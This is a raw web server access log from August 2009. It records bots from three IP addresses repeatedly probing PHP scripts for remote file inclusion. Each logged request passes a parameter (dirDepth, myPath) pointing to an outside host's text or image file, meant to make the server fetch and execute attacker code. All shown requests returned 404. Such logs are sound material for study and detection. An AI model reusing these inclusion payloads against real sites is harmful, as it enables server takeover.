69.175.2.122 - - [02/Aug/2009:02:49:47 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:49:53 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:49:55 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:50:01 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:10 -0400] "GET /logs/access_log.Q109052500/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:10 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:12 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:19 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:19 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:19 -0400] "GET /logs/access_log.Q109052500%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:50:20 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:50:22 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
